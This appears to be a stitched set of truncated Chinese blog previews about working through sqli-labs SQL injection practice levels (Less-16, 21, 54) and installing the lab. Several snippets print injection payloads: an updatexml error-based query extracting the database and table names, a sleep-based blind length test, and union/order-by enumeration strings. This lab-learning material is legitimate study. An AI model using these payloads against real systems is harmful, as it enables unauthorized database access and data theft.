第21关一.登录页面二.BurpSuite抓包，进入重放器三.查询数据库先进行编码')andupdatexml(1,concat(1,database()),1)#四.查表，先进行编码')andupdatexml(1,concat(1,(selectgroup_concat(table_name)frominformation_schema.tableswheretable_schema='secur

第16关一.判断闭合方式闭合方式点“）admin")and1=1#二.判断数据库长度admin")andif(length(database())>7,0,sleep(5))#页面无延迟 admin")andif(length(database())>8,0,sleep(5))# 页面有延迟说明数据库长度为8三.判断数据库的第一个字符admin")and

【Less-54】与前面的题目不同是，这里只能提交10次，一旦提交超过十次，数据会重新刷新，所有的步骤需要重来一次。解题步骤：根据测试，使用的是单引号闭合。#判断字段的数量?id=1'orderby3--aaa#获取数据库的名字?id=-1'unionselect1,2,database()--aa#获取数据

首先打开网页，进行注入点的测试输入?id=1and1=1发现1=2的时候出现了报错，说明服务器接收了我们的指令，并且进行了反馈，说明了有注入点的存在，然后对注入点进行测试然后输入orderby（）来拆解一下有多少个显示字段，输入4发现没有回显，输入orderby3发现有回显并且有三个显示字段，然后输入u

首先打开网页，进行注入点的测试输入?id=1and1=1发现1=2的时候没有进行报错，有两种可能，一种是不能注入，第二种是字符型可以通过对字符型里面的''进行闭合，输入'and1=1--+发现在1=2的情况下出现了报错，说明还是可以进行注入的， 然后输入'orderby()--+来拆解一下有多少个显示字段，

第一次接触sql,也是第一次接触web，在学长的指导下借助sqllabs靶场来对sql注入进行学习。不知不觉二十多天过去了，学长给的靶场任务也完成了。现在写一些东西来记录一下。首

近段时间疏于对Web知识的应用，关于SQL注入的手法过于生疏之后，便突发奇想再次安装sqlilabs学习SQL注入，以下是简便的安装过程安装环境：Windows11PHPstudy2018sq